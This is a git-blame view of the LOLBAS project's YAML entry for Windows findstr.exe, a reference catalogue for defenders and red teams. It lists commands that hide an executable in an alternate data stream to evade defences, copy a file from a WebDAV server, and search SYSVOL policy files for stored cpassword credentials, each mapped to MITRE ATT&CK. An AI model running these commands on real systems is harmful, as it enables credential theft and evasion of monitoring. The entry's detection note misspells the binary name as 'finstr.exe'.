public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-26 14:59:03 +01:00
Code Issues Projects Releases Wiki Activity
95baee85fd
LOLBAS/yml/OSBinaries/Findstr.yml

52 lines
2.5 KiB
YAML
Raw Normal View History

Initial commit - LOLBAS V2.0
2018-06-09 00:15:06 +02:00
---
Name: Findstr.exe
Changed all OSBinaries according to the new template
2018-09-24 21:59:43 +02:00
Description:
Author: 'Oddvar Moe'
Initial commit - LOLBAS V2.0
2018-06-09 00:15:06 +02:00
Created: '2018-05-25'
Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Changed all OSBinaries according to the new template
2018-09-24 21:59:43 +02:00
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
Changed alternate data stream to ADS as category
2018-09-26 09:34:01 +02:00
Category: ADS
Changed all OSBinaries according to the new template
2018-09-24 21:59:43 +02:00
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Initial commit - LOLBAS V2.0
2018-06-09 00:15:06 +02:00
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Changed all OSBinaries according to the new template
2018-09-24 21:59:43 +02:00
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
Changed alternate data stream to ADS as category
2018-09-26 09:34:01 +02:00
Category: ADS
Changed all OSBinaries according to the new template
2018-09-24 21:59:43 +02:00
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: findstr /S /I cpassword \\sysvol\policies\*.xml
Description: Search for stored password in Group Policy files stored on SYSVOL.
Usecase: Find credentials stored in cpassword attrbute
Category: Credentials
Privileges: User
MitreID: T1081
MitreLink: https://attack.mitre.org/wiki/Technique/T1081
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
Usecase: Download/Copy file from webdav server
Category: Download
Privileges: User
MitreID: T1185
MitreLink: https://attack.mitre.org/wiki/Technique/T1185
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Major changes to Web portal - Small fixes to source files to adjust
2018-12-10 14:28:12 +01:00
Full_Path:
Changed all OSBinaries according to the new template
2018-09-24 21:59:43 +02:00
- Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe
Major changes to Web portal - Small fixes to source files to adjust
2018-12-10 14:28:12 +01:00
Code_Sample:
Changed all OSBinaries according to the new template
2018-09-24 21:59:43 +02:00
- Code:
Detection:
- IOC: finstr.exe should normally not be invoked on a client system
Initial commit - LOLBAS V2.0
2018-06-09 00:15:06 +02:00
Resources:
Changed all OSBinaries according to the new template
2018-09-24 21:59:43 +02:00
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---
Reference in New Issue Copy Permalink